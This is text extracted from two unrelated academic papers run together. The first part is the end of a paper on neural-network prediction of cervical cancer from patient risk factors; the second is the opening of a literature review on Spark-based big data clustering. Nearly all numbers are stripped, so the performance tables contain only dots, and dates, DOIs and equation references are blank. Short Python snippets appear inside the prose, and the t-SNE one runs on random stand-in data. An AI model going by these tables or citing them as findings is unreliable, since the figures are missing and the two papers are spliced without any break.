the main hyper-parameters related to the network topology are the depth and width, which define the number of layers in the architecture and the size of the low-dimensional representation. table feature names and data type acquired in the risk factors dataset (fernandes, cardoso & fernandes, b). feature type feature type age int iud (years) int number of sexual partners bool � int sexually transmitted diseases (stds) (yes/no) bool � bool age of first sexual intercourse bool � int number of stds int number of pregnancies bool � int diagnosed stds categorical smokes (yes/no) bool � bool stds (years since first diagnosis) int smokes (years and packs) int � int stds (years last diagnosis) int hormonal contraceptives (yes/no) bool previous cervical diagnosis (yes/no) bool hormonal contraceptives (years) int previous cervical diagnosis (years) int intrauterine device (iud) (yes/no) bool previous cervical diagnosis categorical note: int, integer; bool, boolean. table set of possible options for fine-tuning each parameter. parameter values depth { , : : : , } width { , } regularization { . , . } bypass usage {false, true} fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we used a stratified -fold cross-validation in the assessment of the proposed methods. we optimized the neural networks by using the rmsprop optimization strategy (tieleman & hinton, ) for a maximum number of epochs, with early stopping after iterations without improvement and a batch size of . we validated these parameters empirically, and it was enough to ensure model convergence in all cases. we also validated the performance of other optimization strategies such as adam and stochastic gradient descent. however, we did not observe any gain in terms of predictive performance or convergence. we use sparse autoencoders by adding an l penalization term, to ensure that each unit combines a small subset of risk factors, as would be done by a human expert. we fine-tuned all the hyper-parameters using a grid search strategy with nested stratified threefold cross-validation. in this sense, we validated the performance of each network configuration on three training-validation partitions and choose the one that maximizes the area under the pr curve. then, for the best configuration, we re-trained the model using the entire training set. we chose the size of the low-dimensional space as part of this nested cross-validation procedure, and chose empirically the parameters related to the optimization algorithm (that are strategy, number of epochs, early stopping). to recreate the decisions made by the physician at different configurations of the screening process, we consider the observability of all possible subsets of screening outcomes when predicting the biopsy results. thereby, we cover scenarios where only behavioral and demographic information is observable (first line of each table with empty subset) up to settings where cytology and colposcopy (hinselmann and schiller) results are available. diagnosis prediction results our proposed architectures with embedding regularization achieved the best diagnosis prediction results in most cases (tables and ) when compared with other neural table performance of the proposed architectures in terms of area under the precision–recall curve. subset baseline semi sym zero svm k-nn dectree . . . . . . . c . . . . . . . h . . . . . . . s . . . . . . . ch . . . . . . . cs . . . . . . . hs . . . . . . . chs . . . . . . . 
best notes: the subset of observable screening strategies include: cytology (c), hinselmann (h), and schiller (s). baseline, deep feed-forward neural network; semi, semi-supervised dimensionality reduction (eq. ); sym, symmetry mapping dimensionality reduction (eq. ); zero, zero mapping dimensionality reduction (eq. ); svm, support vector machine; k-nn, k-nearest neighbors; dectree, decision tree. we highlight the best performing models in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ network approaches. furthermore, the fully supervised embeddings improved the performance of the semi-supervised approach (eq. ), through both the strategies (symmetric and zero mapping). the relative gains in terms of area under the pr curve depend on the subset of observable modalities, ranging from . % when only medical records are observed to . % when the outcome of all the screening procedures is known. using a paired difference student’s t-test (menke & martinez, ) with a % confidence level, zero-mapping methodology achieved better results than the baseline and semi-supervised learning schemes. we found no statistical differences between the symmetry and zero mappings. we validated the performance of traditional machine learning models such as support vector machines (svm) with radial basis function kernel (scholkopf et al., ), k-nearest neighbors (peterson, ), and decision trees (quinlan, ). in general, the proposed models surpassed the performance of the classical methodologies in terms of area under the pr curve. the svm model achieved better logarithmic loss given the post-processing of its scores using the logistic regression model that directly optimize this metric. further improvements could be observed by post-processing the outcome of the other strategies. the gains achieved by the mapping-based supervised embeddings happen because the proposed fully-supervised strategies aim to reduce the overlap between observations from both classes. in the past, researchers showed that class overlap has higher correlation with the model performance than the imbalance ratio in highly unbalanced datasets (cruz et al., ). the visualization of the embeddings through the t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ) confirms this aspect, because in t-sne fully supervised embeddings achieve better separability and fewer overlapping clusters (figs. – ). table performance of the proposed architectures in terms of logarithmic loss. subset baseline semi sym zero svm k-nn dectree . . . . . . . c . . . . . . . h . . . . . . . s . . . . . . . ch . . . . . . . cs . . . . . . . hs . . . . . . . chs . . . . . . . best notes: the subset of observable screening strategies include: cytology (c), hinselmann (h), and schiller (s). area under the precision–recall curve. baseline, deep feed-forward neural network; semi, semi-supervised dimensionality reduction (eq. ); sym, symmetry mapping dimensionality reduction (eq. ); zero, zero mapping dimensionality reduction (eq. ); svm, support vector machine; k-nn, k-nearest neighbors; dectree, decision tree. we highlight the best performing models in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure two-dimensional projection of the unsupervised embedding using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. 
/fig- figure two-dimensional projection of the semi-supervised embedding using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure two-dimensional projection of the semi-supervised embedding with symmetry mapping using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- figure two-dimensional projection of the supervised embedding with zero mapping using t-distributed stochastic neighbor embedding (t-sne) (van der maaten & hinton, ). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for visualization purposes, we are using t-sne based upon neighborhood similarities, since learning a valuable representation in a two-dimensional space raises difficulties. moreover, because of the high dimensionality of our embeddings, their reduction capabilities rely on their sparsity. results in other applications to observe the impact of our method, we validated the performance of the aforementioned model architectures on several biomedical datasets available on the uc irvine machine learning repository. thus, we assessed the model’s performance on nine datasets. the machine learning models we proposed achieved high prediction results, being the zero-mapping approach the best model in most cases (tables and ). table performance of the proposed architectures on other datasets downloaded from uc irvine machine learning repository (university of california irvine, ), measured through the area under the precision–recall curve. dataset baseline semi sym zero breast cancer mangasarian, street & wolberg ( ) . . . . mammography elter, schulz-wendtland & wittenberg ( ) . . . . parkinson little et al. ( ) . . . . pima diabetes smith et al. ( ) . . . . lung cancer hong & yang ( ) . . . . cardiotocography ayres-de campos et al. ( ) . . . . spectf heart kurgan et al. ( ) . . . . arcene guyon et al. ( ) . . . . colposcopy qa fernandes, cardoso & fernandes ( b) . . . . best note: we highlight the best performing models in bold. table performance of the proposed architectures on other datasets downloaded from uc irvine machine learning repository (university of california irvine, ), measured through logarithmic loss. dataset baseline semi sym zero breast cancer mangasarian, street & wolberg ( ) . . . . mammographic elter, schulz-wendtland & wittenberg ( ) . . . . parkinson little et al. ( ) . . . . pima diabetes smith et al. ( ) . . . . lung cancer hong & yang ( ) . . . . cardiotocography ayres-de campos et al. ( ) . . . . spectf heart kurgan et al. ( ) . . . . arcene guyon et al. ( ) . . . . colposcopy qa fernandes, cardoso & fernandes ( b) . . . . best note: we highlight the best performing models in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this outcome suggests that mapping the majority class to a unique point in the space might improve the learning effectiveness in unbalanced settings. this idea draws a link between binary and one-class classification, and we plan to explore it more in the future. 
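as a hedged sketch of how the two-dimensional t-sne projections discussed above can be produced, the snippet below projects a set of embeddings with scikit-learn; the random codes and labels are stand-ins for the codes that would come from something like encoder.predict(X) on the trained network and for the biopsy outcomes.

```python
import numpy as np
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE

# stand-in embeddings and labels; replace with the codes produced by the
# trained encoder and the corresponding biopsy outcomes in a real run.
rng = np.random.default_rng(3)
codes = rng.random((200, 4))                  # stand-in low-dimensional embeddings
labels = (rng.random(200) < 0.1).astype(int)  # stand-in biopsy outcomes

proj = TSNE(n_components=2, perplexity=30, random_state=0).fit_transform(codes)

plt.scatter(proj[labels == 0, 0], proj[labels == 0, 1], s=10, label="healthy")
plt.scatter(proj[labels == 1, 0], proj[labels == 1, 1], s=10, label="cancer")
plt.legend()
plt.title("t-SNE projection of the embedding space")
plt.show()
```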
discussion as shown in the results section, our deep learning algorithm can predict cervical cancer diagnosis with high accuracy. to further understand the clinical interpretability of our prediction model, we investigated which dataset risk features have the highest impact in the cervical cancer diagnosis for the patients. figure agglomerative clustering of features by impact on the embedding space. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in fact, pre-invasive intra-epithelial lesions of the cervix and cervical cancer relate to hpv infection of oncological serotypes that progress to oncological lesions, and multiple factors contribute to this progress without a definite cause-dependent relation. the patterns that have highest acceptance in the literature regard presence of human immunodeficiency virus and smoking, followed by sexual risk behaviors such as early sexual initiation, promiscuity, multiple pregnancies, and a history of sexually transmitted infections. another factor involved is the use of oral contraceptives. from a technical point of view, while black-box machine learning techniques have achieved state-of-the-art results in several applications, the lack of interpretability of the induced models can limit their general acceptance by the medical community. thus, we tried to understand the relationships by using our prediction model to corroborate if they are supported by the medical literature. in this context, we studied the impact of the original features on the embedding space to find correlations in the decision process. to determine this impact, we perturbed each feature using all the other values from the feature’s domain, and then we computed the maximum impact of the features in the embedded space. finally, we applied an agglomerative clustering technique to aggregate features with similar impact in the embedding features. from a medical point of view, we validated several properties of interest (fig. ). for instance, risky sexual patterns such as an early sexual initiation and the presence (and lifespan) of stds (with a special focus on hpv) have the most similar impact in the predictive outcome of the model. also, smoking habits are associated by the model as having a similar effect as these sexual patterns. these relationships were already studied in the medical literature (louie et al., ; deacon et al., ). the similarity between the use of hormonal contraceptives with condylomatosis and the use of intrauterine devices with stds shows another interesting pattern that has not been quantified yet to the best of our knowledge. these patterns might be evidence of sexual patterns with high risk. conclusion cervical cancer is still a widespread disease nowadays, and its diagnosis often requires frequent and very time-consuming clinical exams. in this context, machine learning can provide effective tools to speed up the diagnosis process, by processing high-scale patients’ datasets in a few minutes. in this manuscript, we presented a computational system for the prediction of cervical patient diagnosis, and for the interpretation of its results. our system consists of a loss function that allows joint optimization of dimensionality reduction, and classification techniques able to promote relevant properties in the embedded spaces. 
our deep learning methods predicted the diagnosis of the patients with high accuracy, and their application to other datasets showed that their robustness and effectiveness is not bounded to cervical cancer. our methods can be used to analyze profiles of patients where the biopsy and potentially other screening results are missing, and are able to predict confidently if they have cervical cancer. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the future, we plan to employ alternative approaches for data missing imputation, such as oversampling through k-nearest neighbors (santos et al., ) or latent semantic indexing similarity (chicco & masseroli, ). we also plan to try alternative prediction models, like probabilistic latent semantic analysis (pinoli, chicco & masseroli, ). finally, we plan to extend our computational system by adding a feature selection step, able to state the most relevant features among the dataset. acknowledgements the authors thank the gynecology service of the hospital universitario de caracas, and francis nguyen (princess margaret cancer centre) for the english proof-reading of this manuscript. additional information and declarations funding this work was funded by the project “nanostima: macro-to-nano human sensing: towards integrated multimodal health monitoring and analytics/norte- - - feder- ” financed by the north portugal regional operational programme (norte ), under the portugal partnership agreement, and through the european regional development fund (erdf), and also by fundacao para a ciencia e a tecnologia (fct) within the phd grant number sfrh/bd/ / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nanostima: macro-to-nano human sensing: towards integrated multimodal health monitoring and analytics: norte- - -feder- . north portugal regional operational programme: norte . portugal partnership agreement. european regional development fund (erdf). fundacao para a ciencia e a tecnologia (fct): sfrh/bd/ / . competing interests the authors declare that they have no competing interests. author contributions � kelwin fernandes conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � davide chicco conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � jaime s. cardoso conceived and designed the experiments, contributed reagents/ materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, proposed parts of the general strategy of the project. � jessica fernandes analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, construction of the dataset and domain expertise about the application. 
data availability the following information was supplied regarding data availability: the dataset is publicly available at the university of california, irvine machine learning repository: https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk +factors% the dataset is also available at github: https://github.com/kelwinfc/cervical-cancer- screening/tree/master/risk-factors/data the software code of the methods used in the project is available at github: https:// github.com/kelwinfc/cervical-cancer-screening/ we implemented the software in python . using the keras (chollet, ) and tensorflow (abadi et al., ) frameworks, and tested it on a computer running the linux ubuntu . operating system. references abadi m, barham p, chen j, chen z, davis a, dean j, devin m, ghemawat s, irving g, isard m, kudlur m, levenberg j, monga r, moore s, murray dg, steiner b, tucker p, vasudevan v, warden p, wicke m, yu y, zheng x, google brain. . tensorflow: a system for large-scale machine learning. in: proceedings of the th usenix symposium on operating systems design and implementation (osdi ), savannah, ga, usa. vol. , – . alipanahi b, delong a, weirauch mt, frey bj. . predicting the sequence specificities of dna- and rna-binding proteins by deep learning. nature biotechnology ( ): – doi . /nbt. . ayres-de campos d, bernardes j, garrido a, marques-de sa j, pereira-leite l. . sisporto . : a program for automated analysis of cardiotocograms. journal of maternal-fetal medicine ( ): – doi . / . bessa s, domingues i, cardosos js, passarinho p, cardoso p, rodrigues v, lage f. . normal breast identification in screening mammography: a study on , images. in: ieee international conference on bioinformatics and biomedicine (bibm). belfast: ieee, – . cangelosi d, pelassa s, morini m, conte m, bosco mc, eva a, sementa ar, varesio l. . artificial neural network classifier predicts neuroblastoma patients’ outcome. bmc bioinformatics ( ): . centers for disease control and prevention (cdc). . cervical cancer screening among women aged – years—united states, – . morbidity and mortality weekly report ( – ): . chicco d. . ten quick tips for machine learning in computational biology. biodata mining ( ): doi . /s - - - . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% https://github.com/kelwinfc/cervical-cancer-screening/tree/master/risk-factors/data https://github.com/kelwinfc/cervical-cancer-screening/tree/master/risk-factors/data https://github.com/kelwinfc/cervical-cancer-screening/ https://github.com/kelwinfc/cervical-cancer-screening/ http://dx.doi.org/ . /nbt. http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chicco d, masseroli m. . software suite for gene and protein annotation prediction and similarity search. ieee/acm transactions on computational biology and bioinformatics ( ): – doi . /tcbb. . . chicco d, sadowski p, baldi p. . deep autoencoder neural networks for gene ontology annotation predictions. in: proceedings of acm bcb . newport beach: acm, – . chollet f. . keras. available at https://github.com/keras-team/keras. cruz r, fernandes k, cardoso js, costa jfp. . tackling class imbalance with ranking. in: the international joint conference on neural networks. vancouver: ieee, – . davis j, goadrich m. . the relationship between precision-recall and roc curves. 
in: proceedings of the rd international conference on machine learning. pittsburgh: acm, – . deacon jm, evans cd, yule r, desai m, binns w, taylor c, peto j. . sexual behaviour and smoking as determinants of cervical hpv infection and of cin among those infected: a case– control study nested within the manchester cohort. british journal of cancer ( ): – doi . /bjoc. . . elter m, schulz-wendtland r, wittenberg t. . the prediction of breast cancer biopsy outcomes using two cad approaches that both emphasize an intelligible decision process. medical physics ( ): – doi . / . . fernandes k, cardoso js, astrup bs. a. automated detection and categorization of genital injuries using digital colposcopy. in: alexandre l, salvador sánchez j, rodrigues j, eds. iberian conference on pattern recognition and image analysis. faro: springer, – . fernandes k, cardoso js, fernandes j. b. transfer learning with partial observability applied to cervical cancer screening. in: alexandre l, salvador sánchez j, rodrigues j, eds. iberian conference on pattern recognition and image analysis. faro: springer, – . fernandes k, cardoso js, fernandes j. . temporal segmentation of digital colposcopies. in: paredes r, cardoso j, pardo x, eds. iberian conference on pattern recognition and image analysis. santiago de compostela: springer, – . graffar m. . une méthode de classification sociale d’échantillons de population. courrier ( ): – . guyon i, gunn s, ben-hur a, dror g. . result analysis of the nips feature selection challenge. in: weiss y, schölkopf b, platt jc, eds. advances in neural information processing systems. vancouver: neural information processing systems foundation, – . he k, zhang x, ren s, sun j. . delving deep into rectifiers: surpassing human-level performance on imagenet classification. in: proceedings of ieee iccv , santiago, chile, – . hong z-q, yang j-y. . optimal discriminant plane for a small number of samples and design method of classifier on the plane. pattern recognition ( ): – doi . / - ( ) -f. kauffman rp, griffin sj, lund jd, tullar pe. . current recommendations for cervical cancer screening: do they render the annual pelvic examination obsolete? medical principles and practice ( ): – doi . / . kiros r, salakhutdinov r, zemel rs. . unifying visual-semantic embeddings with multimodal neural language models. available at http://arxiv.org/abs/ . . kurgan la, cios kj, tadeusiewicz r, ogiela m, goodenday ls. . knowledge discovery approach to automated cardiac spect diagnosis. artificial intelligence in medicine ( ): – doi . /s - ( ) - . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tcbb. . https://github.com/keras-team/keras http://dx.doi.org/ . /bjoc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / - ( ) -f http://dx.doi.org/ . / http://arxiv.org/abs/ . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lacoste-julien s, sha f, jordan mi. . disclda: discriminative learning for dimensionality reduction and classification. in: bengio y, schuurmans d, lafferty jd, williams cki, culotta a, eds. advances in neural information processing systems. vancouver: neural information processing systems foundation, – . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . levy o, goldberg y, ramat-gan i. . linguistic regularities in sparse and explicit word representations. in: morante r, yih sw, eds. conll. baltimore: association for computational linguistics, – . li w, prasad s, fowler je, bruce lm. 
. locality-preserving dimensionality reduction and classification for hyperspectral image analysis. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . little ma, mcsharry pe, roberts sj, costello da, moroz im. . exploiting nonlinear recurrence and fractal scaling properties for voice disorder detection. biomedical engineering online ( ): doi . / - x- - . louie ks, de sanjose s, diaz m, castellsague x, herrero r, meijer cj, shah k, franceschi s, munoz n, bosch fx. . early age at first sexual intercourse and early pregnancy are risk factors for cervical cancer in developing countries. british journal of cancer ( ): – doi . /sj.bjc. . mangasarian ol, street wn, wolberg wh. . breast cancer diagnosis and prognosis via linear programming. operations research ( ): – doi . /opre. . . . menke j, martinez tr. . using permutations instead of student’s t distribution for p-values in paired-difference algorithm comparisons. in: ieee international joint conference on neural networks, proceedings. vol. . budapest: ieee, – . moore jh. . computational analysis of gene-gene interactions using multifactor dimensionality reduction. expert review of molecular diagnostics ( ): – doi . / . . . . peterson le. . k-nearest neighbor. scholarpedia ( ): doi . /scholarpedia. . pinoli p, chicco d, masseroli m. . computational algorithms to predict gene ontology annotations. bmc bioinformatics (suppl. ):s doi . / - - -s -s . plissiti me, nikou c. . a review of automated techniques for cervical cell image analysis and classification. in: andreaus u, iacoviello d, eds. biomedical imaging and computational modeling in biomechanics. dordrecht: springer, – . quinlan jr. . induction of decision trees. machine learning ( ): – doi . /bf . ronneberger o, fischer p, brox t. . u-net: convolutional networks for biomedical image segmentation. in: international conference on medical image computing and computer-assisted intervention. munich: springer, – . santos ms, abreu ph, garca-laencina pj, simão a, carvalho a. . a new cluster-based oversampling method for improving survival prediction of hepatocellular carcinoma patients. journal of biomedical informatics : – doi . /j.jbi. . . . scholkopf b, sung k-k, burges cj, girosi f, niyogi p, poggio t, vapnik v. . comparing support vector machines with gaussian kernels to radial basis function classifiers. ieee transactions on signal processing ( ): – doi . / . . smith jw, everhart j, dickson w, knowler w, johannes r. . using the adap learning algorithm to forecast the onset of diabetes mellitus. in: proceedings of the annual symposium on fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nature http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . / - x- - http://dx.doi.org/ . /sj.bjc. http://dx.doi.org/ . /opre. . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /scholarpedia. http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ computer application in medical care. new york: american medical informatics association, . srivastava n, hinton ge, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning research ( ): – . tieleman t, hinton g. . lecture . —rmsprop: divide the gradient by a running average of its recent magnitude. coursera: neural networks for machine learning ( ): – . university of california irvine. . 
machine learning repository. available at http://archive.ics.uci.edu/ml/ (accessed august ). university of california irvine machine learning repository. . cervical cancer (risk factors) data set. available at https://archive.ics.uci.edu/ml/datasets/cervical+cancer+% risk+factors% (accessed february ). van der maaten l, hinton g. . visualizing data using t-sne. journal of machine learning research : – . van der maaten l, postma e, van den herik j. . dimensionality reduction: a comparative. journal of machine learning research : – . vincent p, larochelle h, bengio y, manzagol p-a. . extracting and composing robust features with denoising autoencoders. in: proceedings of icml . helsinki: acm, – . xu t, zhang h, huang x, zhang s, metaxas dn. . multimodal deep learning for cervical dysplasia diagnosis. in: international conference on medical image computing and computer-assisted intervention. athens: springer, – .
submitted august
accepted november
published november
corresponding author mozamel m. saeed, m.musa@psau.edu.sa, mozamel @gmail.com
academic editor feng xia
additional information and declarations can be found on page
doi . /peerj-cs.
copyright saeed et al., distributed under creative commons cc-by. open access

big data clustering techniques based on spark: a literature review
mozamel m. saeed, zaher al aghbari and mohammed alsharidah
department of computer science, prince sattam bin abdulaziz university, riyadh, saudi arabia
department of computer science, university of sharjah, sharjah, united arab emirates

abstract
a popular unsupervised learning method, known as clustering, is extensively used in data mining, machine learning and pattern recognition. the procedure involves grouping single and distinct points into groups in such a way that points in the same group are similar to each other and dissimilar to points of other clusters. traditional clustering methods are greatly challenged by the recent massive growth of data. therefore, several research works have proposed novel designs for clustering methods that leverage the benefits of big data platforms, such as apache spark, which is designed for fast and distributed massive data processing. however, spark-based clustering research is still in its early days. in this systematic survey, we investigate the existing spark-based clustering methods in terms of their support for the characteristics of big data. moreover, we propose a new taxonomy for the spark-based clustering methods. to the best of our knowledge, no survey has been conducted on spark-based clustering of big data. therefore, this survey aims to present a comprehensive summary of the previous studies in the field of big data clustering using apache spark during the span of – . this survey also highlights the new research directions in the field of clustering massive data.

subjects data mining and machine learning, data science, distributed and parallel computing
keywords spark-based clustering, big data clustering, spark, big data

introduction
with the emergence of g technologies, a tremendous amount of data is being generated very quickly, accumulating into the massive volumes that are termed big data. the attributes of big data, such as huge volume, a diverse variety of data, high velocity and multivalued data, make data analytics difficult. moreover, extracting meaningful information from such volumes of data is not an easy task (bhadani & jothimani, ). as an indispensable tool of data mining, clustering algorithms play an essential role in big data analysis.
clustering methods are mainly divided into density-based, partition-based, hierarchical, and model-based clustering. all these clustering methods are developed to tackle the same problem: grouping single and distinct points in such a way that points within a group are similar to each other and dissimilar to points of other clusters. they work as follows: ( ) randomly select initial clusters and ( ) iteratively optimize the clusters until an optimal solution is reached (dave & gianey, ); a short illustrative sketch of this iterative loop is given later in this introduction. clustering has an enormous range of applications. for instance, clustering is used in intrusion detection systems for the detection of anomalous behaviours (othman et al., ; hu et al., ). clustering is also used extensively in text analysis to classify documents into different categories (fasheng & xiong, ; baltas, kanavos & tsakalidis, ). however, as the scale of the data generated by modern technologies is rising exponentially, these methods become computationally expensive and do not scale up to very large datasets. thus, they are unable to meet the current demands of contemporary data-intensive applications (ajin & kumar, ). to handle big data, clustering algorithms must be able to extract patterns from data that are unstructured, massive and heterogeneous.
apache spark is an open-source platform designed for fast, distributed big data processing. primarily, spark refers to a parallel computing architecture that offers several advanced services such as machine learning algorithms and real-time stream processing (shoro & soomro, ). as such, spark is gaining momentum and is being widely adopted by enterprises because of its relative advantages. spark has grabbed the attention of researchers for processing big data because of its supremacy over other frameworks like hadoop mapreduce (verma, mansuri & jain, ). spark can also run in hadoop clusters and access any hadoop data source. moreover, the parallelization of clustering algorithms on spark is an active research problem, and researchers are finding ways to improve the performance of clustering algorithms.
the implementation of clustering algorithms using spark has recently attracted a lot of research interest. this survey presents the state-of-the-art research on clustering algorithms using the spark platform. research on this topic is relatively new. efforts started to increase in the last few years, after big data platforms such as apache spark were developed. this resulted in a number of research works that designed clustering algorithms to take advantage of the big data platforms, especially spark due to its speed advantage. therefore, review articles are needed to give an overview of the methodologies for clustering big data, highlight the findings of research and identify the existing gaps in this area.
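to make the generic select-and-optimize procedure described above concrete, the following is a minimal, illustrative sketch, not taken from any of the surveyed papers, of the lloyd-style loop that underlies partition-based methods such as k-means; the toy data, the number of clusters and the convergence threshold are arbitrary choices made for this example.

```python
import numpy as np

def lloyd_kmeans(points, k, max_iter=100, tol=1e-6, seed=0):
    """illustrative lloyd-style loop: pick random initial centres, then alternately
    (1) assign every point to its nearest centre and (2) recompute each centre as the
    mean of its assigned points, until the centres stop moving."""
    rng = np.random.default_rng(seed)
    centres = points[rng.choice(len(points), size=k, replace=False)]
    for _ in range(max_iter):
        # assignment step: index of the nearest centre for every point
        dists = np.linalg.norm(points[:, None, :] - centres[None, :, :], axis=2)
        labels = dists.argmin(axis=1)
        # update step: mean of the points assigned to each centre (keep old centre if empty)
        new_centres = np.array([
            points[labels == j].mean(axis=0) if np.any(labels == j) else centres[j]
            for j in range(k)
        ])
        if np.linalg.norm(new_centres - centres) < tol:  # converged
            break
        centres = new_centres
    return centres, labels

# toy data: two well-separated blobs of points
data = np.vstack([np.random.randn(100, 2), np.random.randn(100, 2) + 5])
centres, labels = lloyd_kmeans(data, k=2)
```

this single-machine loop is exactly the computation that becomes expensive at big data scale, which motivates the distributed, spark-based designs surveyed in the rest of the paper.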
consequently, few researchers have published review articles (labrinidis & jagadish, ; gousios, ; aziz, zaidouni & bellafkih, ; salloum et al., ; mishra, pathan & murthy, ; aziz, zaidouni & bellafkih, ; assefi et al., ; armbrust et al., ; xin et al., ; xu & tian, ; zerhari, lahcen & mouline, ). these review articles either predate the period covered here or do not present a comprehensive discussion of all types of clustering methods. therefore, a comprehensive review of big data clustering algorithms using apache spark, conducted on the basis of a scientific search strategy, is needed. to the best of our knowledge, no survey has been conducted on spark-based clustering of big data. for this purpose, this survey aims to present a comprehensive summary of the previous studies in the field of big data clustering using apache spark during the span of – . the contributions of this review are:
• this review includes quality literature from pre-defined resources and based on pre-defined inclusion/exclusion criteria. therefore, out of the full-text articles studied, articles were included.
• a taxonomy of spark-based clustering methods that may point researchers to new techniques or new research areas.
• a comprehensive discussion on the existing spark-based clustering methods and the research gaps in this area. furthermore, we present some suggestions for new research directions.
we believe that researchers in the general area of clustering big data, and especially those designing and developing spark-based clustering methods, would benefit from the findings of this comprehensive review.
the rest of this survey is organised as follows. 'background' presents a background on apache spark and the challenges of clustering big data. in 'literature review', we review the surveys related to the topic of clustering big data. 'survey methodology' explains the methodology used in this survey. 'spark-based clustering algorithms' discusses the different spark clustering algorithms. in 'discussion and future direction', we present our discussion of clustering big data using spark and future work. finally, we conclude the paper in 'conclusions'.
background
over the last decade, a huge amount of data has been generated. this increase in data volume is attributed to the growing adoption of mobile phones, cloud-based applications, artificial intelligence and the internet of things. contemporary data come from different sources with high volume, variety and velocity, which makes the process of mining extremely challenging and time consuming (labrinidis & jagadish, ). these factors have motivated the academic and industrial communities to develop various distributed frameworks to handle the complexity of modern datasets in a reasonable amount of time. in this regard, apache spark, a cluster-computing framework, is an emerging parallel platform that is cost-effective, fast, fault-tolerant and scalable. such features make spark an ideal platform for the dynamic nature of contemporary applications. spark is designed to support a wide range of workloads including batch applications, iterative algorithms, interactive queries, and streaming (gousios, ). spark extends the hadoop model and supports features such as in-memory computation and resilient distributed datasets, which make it significantly faster than traditional hadoop map-reduce for processing large data (aziz, zaidouni & bellafkih, ).
as shown in fig. , at the fundamental level, spark consists of two main components: a driver, which takes the user code and converts it into multiple tasks that can be distributed across the hosts, and executors, which perform the required tasks in parallel. spark is based on the rdd, a collection of data records that is partitioned across the nodes of the cluster. spark supports two main kinds of operations: transformations and actions. a transformation performs an operation on an rdd and generates a new rdd, while actions are performed on an rdd to produce an output (salloum et al., ); a minimal sketch of these operations is given at the end of this overview of the spark components.
figure: apache spark architecture.
spark components
spark core. spark core is the foundation of apache spark and contains important functionalities, including components for task scheduling, memory management, fault recovery, and interacting with storage systems. spark core is also home to the api that defines resilient distributed datasets (rdds), which are spark's main programming abstraction. rdds represent a collection of items distributed across many compute nodes that can be manipulated in parallel. spark core provides many apis for building and manipulating these collections (mishra, pathan & murthy, ).
spark streaming. the spark streaming component provides a scalable, high-throughput api for processing real-time stream data from various sources. examples of data streams include log files generated by production web servers, or queues of messages containing status updates of a particular system (aziz, zaidouni & bellafkih, ).
spark mllib. spark comes with a library, mllib, which supports several common machine learning algorithms, including classification, regression, clustering, feature extraction, transformation and dimensionality reduction (assefi et al., ).
spark sql. spark sql (armbrust et al., ) is a module for processing structured data, which also enables users to perform sql queries. this module builds on the rdd abstraction by providing the spark core engine with more information about the structure of the data.
